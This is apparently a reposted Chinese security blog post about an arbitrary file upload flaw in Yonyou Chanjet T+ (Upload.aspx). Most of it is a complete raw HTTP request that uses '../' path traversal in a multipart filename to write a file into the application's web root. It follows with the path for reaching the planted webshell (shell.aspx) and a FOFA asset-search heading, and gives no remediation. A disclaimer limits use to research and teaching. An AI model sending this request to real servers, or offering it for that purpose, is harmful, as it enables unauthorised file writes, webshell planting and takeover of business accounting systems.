- 影响范围 -
- FOFA -
/tplus/SM/SetupAccount/Upload.aspx
App_Web_upload.aspx.9475d17f.dll
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 261
User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu
Connection: close
------WebKitFormBoundaryVXR9biLu
Content-Disposition: form-data; name="File1";filename="../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt"
Content-Type: image/jpeg
1
------WebKitFormBoundaryVXR9biLu--
再访问写入的Webshell进行连接
/tplus/shell.aspx?preload=1
-延伸阅读-
知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)
-聆听你的声音-
如果你有独到的想法和建议,欢迎私信与我一同分享!
原文始发于微信公众号(安全攻防渗透):知识分享6:用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论